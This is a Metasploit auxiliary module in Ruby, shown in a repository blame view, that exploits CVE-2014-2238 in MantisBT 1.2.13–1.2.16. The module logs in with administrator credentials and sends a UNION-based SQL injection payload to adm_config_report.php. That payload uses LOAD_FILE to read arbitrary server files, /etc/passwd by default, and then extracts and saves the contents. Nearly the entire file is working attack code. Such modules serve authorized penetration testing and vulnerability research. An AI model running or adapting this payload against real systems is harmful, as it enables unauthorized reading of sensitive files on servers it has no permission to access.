metasploit-framework/modules/auxiliary/gather/mantisbt_admin_sqli.rb

105 lines
3.1 KiB
Ruby
Raw Normal View History

2014-03-03 20:36:38 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-03-04 18:08:31 +00:00
## Current source: https://github.com/rapid7/metasploit-framework
###
2014-03-03 20:36:38 +00:00
require 'msf/core'
2014-03-04 18:08:31 +00:00
class Metasploit4 < Msf::Auxiliary
2014-03-03 20:36:38 +00:00
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
2014-03-03 20:40:58 +00:00
Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
an attacker can gain access to administrative credentials.
This vuln was fixed in 1.2.17.
2014-03-03 20:36:38 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jakub Galczyk', #initial discovery
2014-03-04 23:51:24 +00:00
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
2014-03-03 20:36:38 +00:00
],
'References' =>
[
['CVE', '2014-2238'],
['URL', 'http://www.mantisbt.org/bugs/view.php?id=17055']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Feb 28 2014"))
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
2014-03-04 19:55:30 +00:00
OptString.new('PASSWORD', [ true, 'Single password', 'root']),
2014-03-03 20:36:38 +00:00
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
], self.class)
end
def run
post = {
'return' => 'index.php',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'secure_session' => 'on'
}
resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.php'),
'method' => 'POST',
'vars_post' => post
})
2014-03-04 18:08:31 +00:00
if !resp or !resp.body
fail_with("Error in server response. Ensure the server IP is correct.")
end
2014-03-03 20:36:38 +00:00
cookie = resp.get_cookies
2014-03-04 18:08:31 +00:00
if cookie == ''
fail_with("Authentication failed")
end
2014-03-03 20:36:38 +00:00
filepath = datastore['FILEPATH'].unpack("H*")[0]
2014-03-04 18:08:31 +00:00
payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27"
payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE"
payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter"
2014-03-03 20:36:38 +00:00
resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
'method' => 'POST',
2014-03-04 18:08:31 +00:00
'data' => payload,
2014-03-03 20:36:38 +00:00
'cookie' => cookie,
})
2014-03-04 18:08:31 +00:00
if !resp or !resp.body
fail_with("Error in server response")
end
2014-03-03 20:36:38 +00:00
2014-03-04 18:08:31 +00:00
#qgjuq is prepended to the result of the sql injection
#qirpq is appended to the result of the sql injection
#This allows the use of a simple regex to grab the contents
#of the file easily from the page source.
file = /qgjuq(.*)qirpq/.match(resp.body)
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
file = [file].pack("H*")
2014-03-03 20:36:38 +00:00
path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])
2014-03-04 18:08:31 +00:00
if path and path != ''
print_good("File saved to: #{path}")
end
2014-03-03 20:36:38 +00:00
end
2014-03-03 20:36:38 +00:00
end